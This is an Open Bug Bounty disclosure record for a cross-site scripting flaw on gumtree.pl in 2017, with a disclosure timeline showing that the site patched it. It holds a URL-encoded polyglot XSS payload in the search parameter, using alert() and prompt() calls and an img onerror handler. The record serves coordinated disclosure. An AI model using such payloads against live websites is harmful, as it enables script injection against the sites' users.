gumtree.pl XSS vulnerability

2017-08-24T12:03:00
ID OBB:281971
Type openbugbounty
Reporter eb
Modified 2017-09-24T01:43:00

Description

Vulnerable URL:
https://www.gumtree.pl/s-/v1p1?q=%27%3Balert%28%2Fopenbugbounty%2F%29%2F%2F%27%3Balert%28%2F%2Fopenbugbounty%2F%29%2F%2F%22%3Ba+lert%28%2Fopenbugbounty%2F%29%2F%2F%22%3Balert%28%2Fopenbugbounty%2F%29%2F%2F+%3E%3C%2Fscript%3E%22%3E%27%3E%3Cscript%3Ealert%28%2Fopenbugbounty%2F%29%3C%2Fscript%3E%22%3E%3C%2Fscript%3E%3Cimg+src%3Dhttp%3A%2F%2Fi.dailymail.co.uk%2Fi%2Fpix%2F2016%2F08%2F11%2F17%2F371d509c00000578+3734+919+speaking_as_she_showcases_her_incredibly_toned_body_in_a_new_bea+a+15_1470931763257.jpg+onerror%3Dprompt%28%27openbugbounty%27%29%3E
Details:

Description| Value
---|---
Patched:| Yes, at
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 2194
VIP website status:| Yes
Check gumtree.pl SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 24 August, 2017 12:03 GMT
Generic security notifications sent to website owner| 24 August, 2017 12:06 GMT
Vulnerability details disclosed by researcher| 23 September, 2017 12:26 GMT
Vulnerability patched by the website owner| 24 September, 2017 01:43 GMT